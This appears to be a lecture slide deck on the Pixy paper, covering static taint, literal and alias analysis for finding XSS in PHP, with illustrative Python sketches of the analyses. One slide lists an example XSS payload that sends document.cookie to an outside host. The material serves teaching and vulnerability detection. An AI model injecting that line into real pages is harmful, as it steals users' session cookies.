Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna.


1 Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities
Nenad Jovanovic, Christopher Kruegel, Engin Kirda
Secure Systems Lab, Vienna University of Technology
Proceedings of the IEEE Symposium on Security and Privacy (May 2006)

2 2008/10/2 Outline
- Introduction
- Taint-Style Vulnerabilities
- Data Flow Analysis
- Empirical Results
- Conclusions
- Comments

3 Introduction (1/2)
- There is an urgent need for automated vulnerability detection in Web application development.
- The existing approaches for mitigating threats to Web applications can be divided into client-side and server-side solutions.
- Server-side solutions:
  - Static approaches: scan source code for vulnerabilities
  - Dynamic approaches: detect vulnerabilities while executing the audited program

4 Introduction (2/2)
- Pixy
  - The first open source tool for statically detecting XSS vulnerabilities in PHP 4 code by means of data flow analysis
  - It can be applied to other taint-style vulnerabilities such as SQL injection or command injection
  - http://pixybox.seclab.tuwien.ac.at/pixy/index.php

5 Taint-Style Vulnerabilities (1/2)
- Of all vulnerabilities in Web applications, problems caused by unchecked input are recognized as being the most common.
  - Attackers inject malicious data into Web applications
  - Attackers manipulate applications using this malicious data
- The authors refer to this class of vulnerabilities as the tainted object propagation problem.
  - Referenced from “Finding security errors in Java programs with static analysis,” in Proceedings of the 14th Usenix Security Symposium, Aug. 2005

6 Taint-Style Vulnerabilities (2/2)
- Tainted data
  - Originates from potentially malicious users
  - Causes security problems at vulnerable points in the program (called sensitive sinks)
  - May enter the program at specific places, and can spread via assignments and similar constructs
  - Can be untainted (sanitized) using a set of operations
- Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities.
  - They differ only with respect to the concrete values of a few parameters

7 Cross-Site Scripting (XSS) (1/2)
- Occurs when dynamically generated Web pages display improperly validated input
- An attacker may embed malicious JavaScript code into dynamically generated pages of trusted sites, in order to:
  - Hijack the user's account credentials
  - Change user settings
  - Steal cookies
  - Insert unwanted content into the page

8 Cross-Site Scripting (XSS) (2/2)
- Reflected cross-site scripting attacks
- Stored cross-site scripting attacks
  - An attacker's malicious script is rendered more than once
- Examples
  - alert('Hello World');
  - A web page about rabbits
  - location.replace('http://rickspage.com/?secret='+document.cookie)

9 Properties of XSS
- Entry points into the program
  - GET: $_GET
  - POST: $_POST
  - COOKIE: $_COOKIE
  - The number of entry points grows when “register_globals” is active
- Sanitization routines
  - htmlentities(), htmlspecialchars(), and type casts
- Sensitive sinks
  - echo()
  - print()
  - printf() …
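
The three parameter groups on this slide can be written down as a small specification object. The following is a minimal Python sketch, not Pixy's actual configuration format: the class name `TaintSpec`, the method `classify`, and the constant `XSS_SPEC` are hypothetical names introduced for illustration, and type casts are left out because they are language constructs rather than named functions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TaintSpec:
    """Parameters that characterize one class of taint-style vulnerability."""

    entry_points: frozenset
    sanitizers: frozenset
    sinks: frozenset

    def classify(self, name: str) -> str:
        """Return the role that a variable or function name plays in this spec."""
        if name in self.entry_points:
            return "entry point"
        if name in self.sanitizers:
            return "sanitizer"
        if name in self.sinks:
            return "sensitive sink"
        return "other"


# Values taken from the slide. The slide's sink list ends with an ellipsis,
# so this set is known to be incomplete.
XSS_SPEC = TaintSpec(
    entry_points=frozenset({"$_GET", "$_POST", "$_COOKIE"}),
    sanitizers=frozenset({"htmlentities", "htmlspecialchars"}),
    sinks=frozenset({"echo", "print", "printf"}),
)
```

Describing another taint-style vulnerability class would, under this sketch, only require a second `TaintSpec` instance with different sets.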

10 Data Flow Analysis (1/4)
- Goal: determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized.
  - Identify the taint value of the variables used in these sinks
- Statically compute certain information for every single program point (or for coarser units such as functions)
- PHP front-end
  - Constructs a parse tree for the PHP input file
  - The parse tree is transformed into a linearized form resembling three-address code (TAC), and kept as a control flow graph for each encountered function
- Three-address code
  - Assembly-like language
  - At most 3 operands: “x = y op z”
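
To make the "at most 3 operands" rule concrete, here is a small sketch that lowers a nested arithmetic assignment into three-address code. It is an illustration only: it parses Python syntax with the standard `ast` module as a stand-in for PHP, and the function name `to_tac` and the temporary names `_t0`, `_t1`, ... are assumptions, not Pixy's naming.

```python
import ast
import itertools


def to_tac(source: str) -> list[str]:
    """Lower one assignment with nested binary operators into three-address code."""
    operators = {ast.Add: "+", ast.Sub: "-", ast.Mult: "*", ast.Div: "/"}
    temps = (f"_t{i}" for i in itertools.count())
    code: list[str] = []

    def lower(node: ast.expr) -> str:
        """Emit code for a subexpression and return the name holding its value."""
        if isinstance(node, ast.Name):
            return node.id
        if isinstance(node, ast.Constant):
            return repr(node.value)
        if isinstance(node, ast.BinOp) and type(node.op) in operators:
            left = lower(node.left)
            right = lower(node.right)
            temp = next(temps)
            # Every emitted statement has the shape "x = y op z".
            code.append(f"{temp} = {left} {operators[type(node.op)]} {right}")
            return temp
        raise ValueError("unsupported expression in this sketch")

    statement = ast.parse(source).body[0]
    if not (
        isinstance(statement, ast.Assign)
        and len(statement.targets) == 1
        and isinstance(statement.targets[0], ast.Name)
    ):
        raise ValueError("expected a single assignment to a simple variable")
    result = lower(statement.value)
    code.append(f"{statement.targets[0].id} = {result}")
    return code
```

For example, `to_tac("x = a + b * c")` yields the three statements `_t0 = b * c`, `_t1 = a + _t0`, and `x = _t1`.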

11 Data Flow Analysis (2/4)
- Operates on the control flow graph (CFG) of a program
  - A data structure built on top of the intermediate code representation, abstracting the control flow behavior of the function that is being compiled
  - Node: atomic statement of the program
  - Edge: flow of control
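
A control flow graph of this kind can be sketched with a very small node type. The names `CfgNode`, `build_if_else_cfg`, and `paths` are hypothetical, and the PHP-like statement labels are invented for the example; the path enumeration only works for graphs without loops.

```python
from dataclasses import dataclass, field


@dataclass
class CfgNode:
    """One atomic statement; successors are the outgoing control flow edges."""

    label: str
    successors: list = field(default_factory=list)

    def add_edge(self, target: "CfgNode") -> None:
        self.successors.append(target)


def build_if_else_cfg() -> CfgNode:
    """Build the CFG of: if ($c) { $v = 3; } else { $v = 4; } echo $v;"""
    branch = CfgNode("if ($c)")
    then_node = CfgNode("$v = 3")
    else_node = CfgNode("$v = 4")
    join = CfgNode("echo $v")
    branch.add_edge(then_node)
    branch.add_edge(else_node)
    then_node.add_edge(join)
    else_node.add_edge(join)
    return branch


def paths(node: CfgNode, prefix: tuple = ()) -> list:
    """Enumerate all paths from node to an exit (acyclic graphs only)."""
    prefix = prefix + (node.label,)
    if not node.successors:
        return [prefix]
    found = []
    for successor in node.successors:
        found.extend(paths(successor, prefix))
    return found
```

Calling `paths(build_if_else_cfg())` lists the two possible executions, one through each branch, both ending at the shared `echo $v` node.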

12 Literal Analysis: Basics
- Purpose: determine, for each program point, the literal that a variable or a constant can hold.
- Can improve the precision of the overall analysis by:
  - Evaluating branch conditions
  - Ignoring program paths that cannot be executed at runtime (called path pruning)
  - Resolving non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses)
- After performing literal analysis
  - Each CFG node is associated with information about which literal is mapped to a variable before that node is executed

13 How Data Flow Analysis Is Used to Perform Literal Analysis
- Assume a fictitious programming language
  - One variable (v)
  - Two literals (the integers 3 and 4)
- “skip” node
  - Empty instruction
- “Ω”
  - Unknown literal

14 Data Flow Analysis (3/4)
- Carrier lattice
  - Information about the program is represented using values from an algebraic structure
  - Every piece of information that could ever be associated with a CFG node by the analysis must be contained as an element of the lattice used
  - Bottom element: “not visited yet” at the beginning
  - Line: ordering between elements with regard to precision
  - Least upper bound: the smallest element that is greater than or equal to both of the elements; needed by the analysis algorithm
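
For the fictitious one-variable language with the literals 3 and 4, the carrier lattice has just four elements. The sketch below spells out the ordering and derives the least upper bound directly from its definition; the string encodings `"bottom"` and `"omega"` and the function names `leq` and `lub` are choices made for this example.

```python
BOTTOM = "bottom"  # "not visited yet"
OMEGA = "omega"    # unknown literal, the top element
ELEMENTS = [BOTTOM, 3, 4, OMEGA]


def leq(a, b) -> bool:
    """Ordering of the lattice: bottom is below everything, omega above everything."""
    return a == b or a == BOTTOM or b == OMEGA


def lub(a, b):
    """Least upper bound: the smallest element that is >= both a and b."""
    upper_bounds = [e for e in ELEMENTS if leq(a, e) and leq(b, e)]
    for candidate in upper_bounds:
        # The least upper bound lies below every other upper bound.
        if all(leq(candidate, other) for other in upper_bounds):
            return candidate
    raise ValueError("not a lattice: no least upper bound found")
```

Two different literals have no common upper bound other than the unknown literal, so `lub(3, 4)` evaluates to `OMEGA`, while `lub(BOTTOM, 3)` stays at `3`.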

15 Data Flow Analysis (4/4)
- Transfer function
  - f: P → P for each node in the control flow graph
    - Input: a lattice element
    - Output: a lattice element
  - Models the effect of the node on the program information
  - Each CFG node is associated with such a transfer function
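
The interplay of transfer functions and the least upper bound can be sketched with a generic worklist iteration over the fictitious one-variable language. This is a textbook-style illustration, not Pixy's implementation; the names `assign`, `skip`, and `analyze`, and the choice of the unknown literal as the value at the entry node, are assumptions.

```python
BOTTOM = "bottom"  # not visited yet
OMEGA = "omega"    # unknown literal


def lub(a, b):
    """Least upper bound for the flat literal lattice."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    return a if a == b else OMEGA


def assign(literal):
    """Transfer function of 'v = literal': the incoming value is overwritten."""
    return lambda _incoming: literal


def skip(incoming):
    """Transfer function of the empty instruction: information passes through."""
    return incoming


def analyze(transfer, edges, entry):
    """Return the lattice element that holds before each node is executed."""
    before = {name: BOTTOM for name in transfer}
    before[entry] = OMEGA  # assumption: v is unknown on entry
    worklist = [entry]
    while worklist:
        name = worklist.pop()
        after = transfer[name](before[name])
        for successor in edges.get(name, []):
            merged = lub(before[successor], after)
            if merged != before[successor]:
                before[successor] = merged
                worklist.append(successor)
    return before


EDGES = {"branch": ["then", "else"], "then": ["join"], "else": ["join"]}
DIFFERENT = {"branch": skip, "then": assign(3), "else": assign(4), "join": skip}
SAME = {"branch": skip, "then": assign(3), "else": assign(3), "join": skip}
```

With `DIFFERENT`, the two branches disagree, so the value before `join` becomes `OMEGA`; with `SAME`, both branches assign 3 and the analysis keeps the precise literal.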

16 Literal Analysis: Basics
- Carrier lattice definition
  - Provides mappings for all variables and constants that appear in the scanned program
  - Able to describe the mapping to any possible literal (infinitely many)

17 Literal Analysis: Basics
- Transfer function definition
  - PHP has no explicit type declarations
  - “Hidden” arrays

18 Four cases in order of increasing complexity
1. Not an array element and not known as an array: strong update
2. An array, but not an array element: array tree
3. An array element without non-literal indices (may be an array): strong overlap

19 Four cases in order of increasing complexity
4. An array element with non-literal indices (may be an array): weak overlap
  - Weak overlap algorithm: all overwrite operations are replaced by least upper bound operations
  - Array elements with one or more non-literal indices are permanently mapped to Ω
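
The difference between overwriting and taking the least upper bound can be shown on a flat variable-to-literal map. This is a deliberately simplified sketch, not the array tree algorithm from the paper: the names `strong_update` and `weak_update` are hypothetical, and arrays are flattened into keys such as `"$a[1]"`.

```python
OMEGA = "omega"  # unknown literal


def lub(a, b):
    """Least upper bound of two literals: equal stays, different becomes unknown."""
    return a if a == b else OMEGA


def strong_update(state: dict, name: str, literal) -> dict:
    """The target is known exactly, so the old literal is overwritten."""
    new_state = dict(state)
    new_state[name] = literal
    return new_state


def weak_update(state: dict, name: str, literal) -> dict:
    """The target is only a possible one, so old and new literal are merged."""
    new_state = dict(state)
    new_state[name] = lub(new_state.get(name, OMEGA), literal)
    return new_state


# "$a[$i] = 4" with an unknown $i may write to either element.
state = {"$a[1]": 3, "$a[2]": 4}
for element in ("$a[1]", "$a[2]"):
    state = weak_update(state, element, 4)
```

After the loop, `$a[1]` is mapped to the unknown literal because it may hold 3 or 4, whereas `$a[2]` remains 4 since both possibilities agree.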

20 Alias Analysis
- Ignoring information about alias relationships would prevent literal analysis from producing correct results in a number of cases.
- Without alias analysis, literal analysis cannot determine that an assignment to $a also affects $b
  - $b would be treated as unchanged, which is incorrect

21 Carrier Lattice Definition
- Alias group: a group of variables referencing the same memory location
- Alias information is modeled through sets of alias group sets
  - (…): an alias group
  - {…}: an alias group set
- Must-aliases of a variable
  - “{(a,b) (c)}”: $b is a must-alias of $a
- May-aliases of a variable
  - “{(a,b) (c)} {(a,c) (b)}”: $b and $c are may-aliases of $a
- The order among lattice elements is defined as subset inclusion
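
The two examples on this slide can be reproduced with nested frozensets. In this sketch a lattice element is a frozenset of alias group sets, and an alias group set is a frozenset of alias groups; the helper names `alias_group_set`, `group_of`, `must_aliases`, `may_aliases`, and `lub` are hypothetical. Since the order is subset inclusion, the least upper bound is taken to be set union.

```python
def alias_group_set(*groups):
    """Build one alias group set such as {(a,b) (c)}."""
    return frozenset(frozenset(group) for group in groups)


def group_of(var, group_set):
    """Return the alias group containing var (its own group if unlisted)."""
    for group in group_set:
        if var in group:
            return group
    return frozenset({var})


def must_aliases(var, element):
    """Variables that share a group with var in every alias group set."""
    groups = [group_of(var, group_set) for group_set in element]
    if not groups:
        return set()
    return set(frozenset.intersection(*groups)) - {var}


def may_aliases(var, element):
    """Variables that share a group with var in some, but not all, group sets."""
    groups = [group_of(var, group_set) for group_set in element]
    anywhere = set().union(*groups) - {var}
    return anywhere - must_aliases(var, element)


def lub(x, y):
    """Subset inclusion as the order makes union the least upper bound."""
    return x | y


one_path = frozenset({alias_group_set(("a", "b"), ("c",))})
other_path = frozenset({alias_group_set(("a", "c"), ("b",))})
merged = lub(one_path, other_path)
```

On `one_path` alone, `$b` is a must-alias of `$a`; after merging the two paths, neither relationship is certain, so `$b` and `$c` both become may-aliases.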

22 Static analysis is not able to decide which path the program will take
  - This holds under the assumption that the branch condition is determined by dynamic factors
  - Examples: environment variables, user input

23 Transfer Function Definition
- Reference assignment
  - “$a = & $b”
- Unset node
  - The unset variable receives its own one-element alias group in each alias group set
- Global node
  - “global $a;”
  - Handled with the equally named variable from the global scope on the right side
- The authors only consider references to simple variables
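
The effect of a reference assignment and of an unset node on alias information might be sketched as follows. This is a simplified reading of the slide, not the paper's exact definition: it ignores scopes and the global node, and the function names `alias_group_set`, `reference_assign`, and `unset` are hypothetical.

```python
def alias_group_set(*groups):
    """Build one alias group set such as {(a,b) (c)}."""
    return frozenset(frozenset(group) for group in groups)


def reference_assign(element, left, right):
    """Sketch of '$left = &$right': left leaves its group and joins right's group."""
    if left == right:
        return element
    result = set()
    for group_set in element:
        new_groups = []
        right_seen = False
        for group in group_set:
            members = set(group) - {left}
            if right in members:
                members.add(left)
                right_seen = True
            if members:
                new_groups.append(frozenset(members))
        if not right_seen:
            # right was not listed yet: create a fresh two-element group
            new_groups.append(frozenset({left, right}))
        result.add(frozenset(new_groups))
    return frozenset(result)


def unset(element, var):
    """Sketch of 'unset($var)': var gets its own one-element alias group."""
    result = set()
    for group_set in element:
        new_groups = [frozenset(set(group) - {var}) for group in group_set]
        new_groups = [group for group in new_groups if group]
        new_groups.append(frozenset({var}))
        result.add(frozenset(new_groups))
    return frozenset(result)


start = frozenset({alias_group_set(("a",), ("b",), ("c",))})
aliased = reference_assign(start, "a", "b")
separated = unset(aliased, "a")
```

Starting from three unrelated variables, the reference assignment produces `{(a,b) (c)}`, and the subsequent unset returns to the initial state.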

24 Literal Analysis Revisited
- Here we only consider references to simple variables
- Functions built into PHP are conservatively modeled as returning Ω, since the precision gained by modeling them exactly is expected to be rather small
  - The only built-in function modeled precisely is “define”

25 Literal Analysis Revisited
- The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value
- On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored

26 Taint Analysis
- Purpose: determine, for each program point, the taint value (instead of the literal) of a variable or constant.
- This makes it possible to check whether any sensitive sink in the program receives malicious data, and hence to detect vulnerabilities

27 Taint Analysis
- Carrier lattice definition
  - Tainted: a variable is tainted if it can hold a malicious, not yet sanitized (checked) value originating from user input
  - Variables are not mapped to literals or Ω, but to one of the taint values tainted and untainted
    - Mapped to tainted: this variable might be tainted
    - Mapped to untainted: this variable is untainted
  - Whenever the analysis cannot determine the taint value, the variable is conservatively assumed to be tainted
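
The two-valued taint lattice and its conservative default can be sketched in a few lines. The names `Taint`, `lub`, and `lookup` are introduced for this example only.

```python
from enum import IntEnum


class Taint(IntEnum):
    """Two-element lattice: untainted lies below tainted."""

    UNTAINTED = 0
    TAINTED = 1


def lub(a: Taint, b: Taint) -> Taint:
    """If a value is tainted on any incoming path, it might be tainted."""
    return max(a, b)


def lookup(state: dict, variable: str) -> Taint:
    """Variables the analysis knows nothing about are assumed to be tainted."""
    return state.get(variable, Taint.TAINTED)
```

Merging an untainted and a tainted value gives tainted, which matches the reading "this variable might be tainted".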

28 Taint Analysis
- Transfer function definition
  - Casting a tainted variable to an integer untaints this variable (with unary operators such as +, -, and (int))
  - Correctly modeling built-in PHP functions can reduce the number of false positives
- On startup, Pixy processes a specification file that contains abstracted versions of some built-in functions in PHP syntax
  - “htmlentities” and “array” return $_UNTAINTED

29 Taint Analysis
- Using the analysis results
  - Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward
  - The analysis information for each sensitive sink is searched for tainted input variables
  - A warning message indicating the corresponding line is issued if such a violation is discovered
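
The warning step can be illustrated on a straight-line program. The following sketch is far simpler than Pixy (no branches, functions, arrays, or aliases), and the statement encoding as tuples, the function name `find_warnings`, and the sample program are all assumptions made for the example.

```python
TAINTED, UNTAINTED = "tainted", "untainted"

ENTRY_POINTS = {"$_GET", "$_POST", "$_COOKIE"}
SANITIZERS = {"htmlentities", "htmlspecialchars"}
SINKS = {"echo", "print", "printf"}


def find_warnings(program):
    """Return (line, sink, variable) for every tainted value reaching a sink.

    Statements are tuples:
      ("assign", target, operand)      for  target = operand
      ("call", target, func, operand)  for  target = func(operand)
      ("sink", func, operand)          for  func(operand)
    """
    taint = {}

    def value(operand):
        if not operand.startswith("$"):
            return UNTAINTED  # literals written by the developer
        if operand in ENTRY_POINTS:
            return TAINTED
        return taint.get(operand, TAINTED)  # unknown: conservatively tainted

    warnings = []
    for line, statement in program:
        kind = statement[0]
        if kind == "assign":
            _, target, operand = statement
            taint[target] = value(operand)
        elif kind == "call":
            _, target, func, _operand = statement
            # Unmodeled functions are conservatively treated as tainted.
            taint[target] = UNTAINTED if func in SANITIZERS else TAINTED
        elif kind == "sink":
            _, func, operand = statement
            if func in SINKS and value(operand) == TAINTED:
                warnings.append((line, func, operand))
    return warnings


PROGRAM = [
    (1, ("assign", "$name", "$_GET")),
    (2, ("call", "$safe", "htmlentities", "$name")),
    (3, ("sink", "echo", "$safe")),
    (4, ("sink", "echo", "$name")),
    (5, ("sink", "echo", "hello")),
]
```

Only line 4 is reported: the sanitized copy on line 3 and the literal on line 5 are untainted, while `$name` still carries user input.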

30 Limitations
- Pixy does not support object-oriented features of PHP.
  - Such constructs are treated optimistically: malicious data is assumed never to arise from them
- Files included with “include” and similar keywords are not scanned automatically
  - The authors frequently observed false positives stemming from these missing file inclusions
  - These were eliminated through manual inclusion

31 Empirical Results

32 Empirical Results


34 Conclusions
- A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities
- Additional literal analysis and alias analysis to improve the correctness and precision of the taint analysis
- Pixy, an open-source Java tool that implements these analysis techniques
- Experimental validation of Pixy's ability to detect unknown vulnerabilities with a low false positive rate

35 Comments
- The first to perform alias analysis for an untyped, reference-based scripting language such as PHP
- Beyond the scope of the paper
  - Recursive calls depend on dynamic information
  - Infinite call depth for non-terminating programs
- The implementation is widely used by the public.
- Future work
  - Automatic inclusion of “include” files

